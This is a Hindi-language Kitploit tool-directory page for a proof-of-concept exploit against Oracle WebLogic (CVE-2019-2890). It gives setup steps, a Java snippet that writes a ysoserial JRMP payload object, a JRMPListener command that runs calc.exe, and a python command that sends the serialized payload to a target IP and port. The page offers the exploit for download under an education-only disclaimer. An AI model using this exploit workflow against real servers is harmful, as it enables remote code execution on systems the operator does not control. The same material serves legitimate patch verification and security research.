Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-2890 — CVE-2019-2890 के लिए PoC एक्सप्लॉइट जो Oracle WebLogic को लक्षित करता है, ysoserial JRMP पेलोड का उपयोग करके सीरियलाइज़्ड ऑब्जेक्ट डी-सीरियलाइज़ेशन के माध्यम से दूरस्थ कमांड निष्पादन के लिए। | Kitploit
उपकरण/GitHubGitHub/l1nk3rlin/cve-2019-2890
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubl1nk3rlin/cve-2019-2890

CVE-2019-2890

CVE-2019-2890 के लिए PoC एक्सप्लॉइट जो Oracle WebLogic को लक्षित करता है, ysoserial JRMP पेलोड का उपयोग करके सीरियलाइज़्ड ऑब्जेक्ट डी-सीरियलाइज़ेशन के माध्यम से दूरस्थ कमांड निष्पादन के लिए।

रिपॉजिटरी देखें
852246 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

घोषणा

केवल शिक्षा और सीखने के उद्देश्यों के लिए उपयोग करें। अन्य उपयोगों के परिणाम स्वयं भुगतने होंगे।

स्पष्टीकरण

संबंधित jar फ़ाइलों को पहले से ही प्रोजेक्ट में आयात कर दिया गया है, और उपयोग का तरीका yso के JRMP का उपयोग करता है। सीखने और डीबग करते समय उपयोग के तरीके को बदला जा सकता है।

पहले, weblogic के अंतर्गत SerializedSystemIni.dat फ़ाइल को security फ़ोल्डर में रखना होगा।

फिर, yso को ysoserial.jar नाम से बदलना होगा और इसे lib निर्देशिका में आयात करना होगा।

1

फिर, weblogic/wsee/jaxws/persistence/PersistentContext.java फ़ाइल में getObject के IP पते और पोर्ट को सेट करें।

root@kitploit:~
        try {
            var3.writeObject(Poc.getObject("127.0.0.1:8000"));
        } catch (Exception e) {
            e.printStackTrace();
        }

अंत में, रिमोट JRMP लिसनर का उपयोग करके, 7u21 कमांड निष्पादित करें।

root@kitploit:~
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"

उपयोग विधि: Poc.java चलाकर poc.ser सीरियलाइज़ेशन फ़ाइल उत्पन्न करें, फिर:

root@kitploit:~
python weblogic.py ip port poc.ser

1

1

टूल डाउनलोड करें